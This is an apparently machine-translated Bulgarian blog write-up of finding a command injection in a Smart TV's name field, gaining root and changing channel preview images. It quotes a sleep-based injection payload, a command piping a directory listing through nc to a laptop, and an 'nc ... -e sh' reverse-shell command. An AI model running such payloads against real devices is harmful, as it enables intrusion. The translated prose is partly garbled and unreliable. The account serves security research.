Нарушаването чрез въвеждането на Smart TV отбори
Това беше един от най-обичайните мързеливи вечери, когато бях пред телевизора след дълъг ден на работа.
Това беше един от най-обичайните мързеливи вечери, когато бях пред телевизора след дълъг ден на работа. Въпреки факта, че се чувствах уморен, аз продължавах да си мисля за уязвимости, открити в рутера, които аз назаем на приятел. Намирането на недостатъци в този вид устройства винаги е забавно упражнение, тъй като подробностите се разкриват, достъпен само за разработчици, а може би и техническа поддръжка.
Когато се работи в областта на информационната сигурност трябва да проверява непрекъснато полезните товари в различни полета за въвеждане. Например, може да е параметър на GET-заявка, използва уеб интерфейса на маршрутизатора контролен панел, новият принтер, или както в моя случай, на телевизора. Мислех, че ще е забавно, ако телевизорът е името на «сън 5".
Фигура 1: параметър, за да зададете име на телевизора
След въвеждане на полезния товар чрез контролния панел и запаметяване на резултатите в менюто с настройки се е отличавал от известно време. Когато телевизорът се върна към живота, аз променили настройката, за да може да се стигне до другите елементи от менюто. В този момент аз все още не осъзнавах, че е открил нещо подобно на уязвимостта, свързана с въвеждането на екипите. В действителност, телевизор избледняват за няколко секунди, след промяна на настройката не е нещо странно. Въпреки това, срокът за толкова дълго време предизвиква любопитството на мен.
избледняване време е много по-дълго от 5 секунди. Може би това е в кавичките, и телевизор, а не очакваше такова въвеждане на данни, дава грешка, за да се предотврати натоварването на тези герои. Опитах се да повтори експеримента и въведе `сън цифрата 0. Този път изрита веднага.
Има нещо не е много ясно, и аз реших да се измери времето за реакция в зависимост от настройката на функция сън. Установено е, че докато менюто на телевизора избледняване винаги три пъти по-дълги от стойността на този параметър:
- спи (2) - 6 секунди
- спи (3) - 9 секунди
- съня (5) - на 15 секунди
На команди по телевизията
Не можех да повярвам, че е в състояние да въведе отбора след първия опит. Fading меню не е сто процента доказателство, и като цяло не е много полезно, ако ние говорим за експлоатация. По мое притежание е 31 знака (минус две единични кавички), полезният товар трябва да бъде не повече от 29 символа.
По-долу показва списък от команди, които се опитах да тече моя телевизор. В предната част на всеки отбор може да получи обяснение, както и в резултат на движение (успех / не успеят).
На следващо място, е необходимо да се свържете телевизора към лаптопа чрез кабелна мрежа, но сега аз се радвам, че го направих, за да изпълняват команди на телевизия само с дистанционно управление.
Получаването на достъп до телевизия Шели
Фигура 2: мрежови настройки бележника
След като стана ясно, че по телевизията има NC програма, реших да се пренасочи резултатите от специфични команди през NC на моя лаптоп. Първи отбор, разбира се, е идентификационният номер, с който е било необходимо, за да разберете дали имаме корен достъп до системата на вашия телевизор.
Фигура 3: Резултатът от komandyid
Както се вижда от графиката по-горе, суперпотребителски правата, които имаме. Този факт не е толкова забележителен, но все пак. На следващо място, аз исках да се знае съдържанието на корен / директория с LS командните `-la / | NC 169.254.56.216 5`.
Фигура 4: Съдържанието на основната директория
Отличен. Въпреки това, аз все още не са имали пълен черупка, за да изпълнява команди. Не всички опции са били тествани в дължина и не бяха много полезни. Въпреки това, тъй като версията е проверено, разположен в телевизор, който поддържа -e флаг, аз бях в състояние да организира обратна черупка с командата `NC 169.254.213.210 5 -e sh`.
Фигура 5: Връщане на корпуса, за да изпълнява команди по телевизията
Сега, когато съм имал пълен черупка, исках да видя резултатите от работата му върху екрана на телевизора. Тук има няколко възможности. Например, промяната на логото при стартиране, или да промените иконите на приложенията. Тъй като имах Smart TV, тя вече е била установена няколко програми, например, YouTube и Skype.
Фигура 6: Това приложение предварително инсталирано на телевизия
Аз забелязах, че по-голямата част на файловата система е на разположение за само за четене, а аз не бях в състояние да променят логото. Въпреки това, има често променящи се изображения, например, в обхвата на визуализации, което може да се наблюдава при превключване на телевизионни канали. Тези програми съдържат преглед на снимките, които идват в момент, когато се движим в канала. Очевидно е, че данните за изображението се съхранява на място, достъпно за четене и писане на файлове.
Икони, съхранявани в .png файлове. За пълен списък на файловете с .png разширение взех находка / -name * .png екип, обаче, не е свързана с картини на файл за визуализация не беше сред резултатите. Направих същото с .jpg формат и видях имена като channelImage123.jpg. След като изтеглите необходимите файлове и подмяна на файл с име, което съдържа низ channelImage, имам следния резултат.
Фигура 7: телевизионен екран с изображения актуализиран
Телевизорът не е толкова умен, колкото си мислиш
Устройства, свързани към Интернет може да бъде уязвимост в най-неочаквани места. Къде очаквате най-малко. Когато се изпитва командата сън, той дори не можеше да си представи, че ми каскадите. Първоначално реших да прекарат своя експеримент с скука. Също така, нямах представа, че моята телевизия работи на операционната система Linux, и е още по-изненадан, че констатираното нарушение експлоатация.
Не използвайте тази уязвимост от разстояние, въпреки че нещо ми подсказва, че съм бил прав, когато реших да не се свържете телевизора си с интернет и да не използвате разширени функции твърде често. Не бих се чувстват комфортно с идеята, че някой може да контролира моя телевизор.
Предполагам, че има по-интересни методи и пропуски, които са подходящи за употреба. Въпреки това, аз мисля, че не е необходимо да се добавят сива коса в момента, когато телевизорът спира, и си мислиш, ако устройството е в ред, или не. В крайна сметка, телевизор е предназначен за релаксация, но не и за високо кръвно налягане, с изключение, когато гледате спортни събития. Например, футбол.
